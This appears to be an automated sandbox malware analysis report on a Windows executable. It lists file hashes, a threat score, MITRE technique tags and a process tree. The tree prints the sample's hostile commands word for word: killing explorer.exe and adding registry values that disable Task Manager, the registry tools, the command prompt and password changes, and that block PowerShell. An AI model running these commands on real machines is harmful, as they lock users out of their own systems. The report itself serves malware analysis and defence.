e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75

Analysis

max time kernel
144s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17-08-2024 13:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe
Size

1.3MB
MD5

104ac91db66a0418f9c0dd69addba3bd
SHA1

0f590be83ec4c22cfb9b760c12350db6b1dbc343
SHA256

e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75
SHA512

ef1fb744b23f283e11c17ff4457c0b3628040479c9f7440f313ac14a100382887f6d3ef8c180304251c18246bbd43b6ea6091521287541223f347f0b08735c08
SSDEEP

24576:JBsk0UWK5CRXx2puz9gfewGz4nQzQdbSBAo3h3QvrnJM0NL:JB1zWK5CRXUpuj8Hd5M0NL

Score

8^/10

discovery evasion

Malware Config

Signatures

Blocks application from running via registry modification 2 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\powershell.exe = "1"	reg.exe

Disables Task Manager via registry modification
evasion

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1116	taskkill.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1116	taskkill.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 1204 wrote to memory of 2188	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	84
PID 1204 wrote to memory of 2188	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	84
PID 1204 wrote to memory of 2188	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	84
PID 2188 wrote to memory of 1116	2188	cmd.exe	85
PID 2188 wrote to memory of 1116	2188	cmd.exe	85
PID 2188 wrote to memory of 1116	2188	cmd.exe	85
PID 1204 wrote to memory of 4588	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	88
PID 1204 wrote to memory of 4588	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	88
PID 1204 wrote to memory of 4588	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	88
PID 4588 wrote to memory of 3948	4588	cmd.exe	89
PID 4588 wrote to memory of 3948	4588	cmd.exe	89
PID 4588 wrote to memory of 3948	4588	cmd.exe	89
PID 1204 wrote to memory of 1920	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	91
PID 1204 wrote to memory of 1920	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	91
PID 1204 wrote to memory of 1920	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	91
PID 1920 wrote to memory of 1628	1920	cmd.exe	92
PID 1920 wrote to memory of 1628	1920	cmd.exe	92
PID 1920 wrote to memory of 1628	1920	cmd.exe	92
PID 1204 wrote to memory of 912	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	93
PID 1204 wrote to memory of 912	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	93
PID 1204 wrote to memory of 912	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	93
PID 912 wrote to memory of 4820	912	cmd.exe	94
PID 912 wrote to memory of 4820	912	cmd.exe	94
PID 912 wrote to memory of 4820	912	cmd.exe	94
PID 1204 wrote to memory of 2436	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	95
PID 1204 wrote to memory of 2436	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	95
PID 1204 wrote to memory of 2436	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	95
PID 2436 wrote to memory of 4548	2436	cmd.exe	96
PID 2436 wrote to memory of 4548	2436	cmd.exe	96
PID 2436 wrote to memory of 4548	2436	cmd.exe	96
PID 1204 wrote to memory of 1156	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	97
PID 1204 wrote to memory of 1156	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	97
PID 1204 wrote to memory of 1156	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	97
PID 1156 wrote to memory of 2560	1156	cmd.exe	98
PID 1156 wrote to memory of 2560	1156	cmd.exe	98
PID 1156 wrote to memory of 2560	1156	cmd.exe	98
PID 1204 wrote to memory of 1488	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	99
PID 1204 wrote to memory of 1488	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	99
PID 1204 wrote to memory of 1488	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	99
PID 1488 wrote to memory of 4276	1488	cmd.exe	100
PID 1488 wrote to memory of 4276	1488	cmd.exe	100
PID 1488 wrote to memory of 4276	1488	cmd.exe	100
PID 1204 wrote to memory of 4404	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	102
PID 1204 wrote to memory of 4404	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	102
PID 1204 wrote to memory of 4404	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	102
PID 4404 wrote to memory of 224	4404	cmd.exe	103
PID 4404 wrote to memory of 224	4404	cmd.exe	103
PID 4404 wrote to memory of 224	4404	cmd.exe	103
PID 1204 wrote to memory of 4692	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	104
PID 1204 wrote to memory of 4692	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	104
PID 1204 wrote to memory of 4692	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	104
PID 4692 wrote to memory of 3316	4692	cmd.exe	105
PID 4692 wrote to memory of 3316	4692	cmd.exe	105
PID 4692 wrote to memory of 3316	4692	cmd.exe	105
PID 1204 wrote to memory of 2376	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	106
PID 1204 wrote to memory of 2376	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	106
PID 1204 wrote to memory of 2376	1204	e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe	106
PID 2376 wrote to memory of 4016	2376	cmd.exe	107
PID 2376 wrote to memory of 4016	2376	cmd.exe	107
PID 2376 wrote to memory of 4016	2376	cmd.exe	107

C:\Users\Admin\AppData\Local\Temp\e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe
"C:\Users\Admin\AppData\Local\Temp\e96ccd431d19b78b1f9315fc0337a8fe4719321574febe1f6015dbda5ceb6c75.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4588
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion" /v RestrictRun /t reg_dword /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion" /v RestrictRun /t reg_dword /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v powershell.exe /t reg_dword /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:912
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v powershell.exe /t reg_dword /d "1" /f
    3⤵
    - Blocks application from running via registry modification
    - System Location Discovery: System Language Discovery
    PID:4820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t reg_dword /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2436
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t reg_dword /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkStation reg_dword /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkStation reg_dword /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword reg_dword /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4404
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword reg_dword /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools reg_dword /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4692
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools reg_dword /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t reg_dword /d "1" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2376
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t reg_dword /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1204-0-0x0000000000401000-0x0000000000478000-memory.dmp

Filesize
476KB

Download
memory/1204-1-0x0000000000400000-0x00000000004CD000-memory.dmp

Filesize
820KB

Download
memory/1204-2-0x0000000000401000-0x0000000000478000-memory.dmp

Filesize
476KB

Download
memory/1204-3-0x0000000000400000-0x00000000004CD000-memory.dmp

Filesize
820KB

Download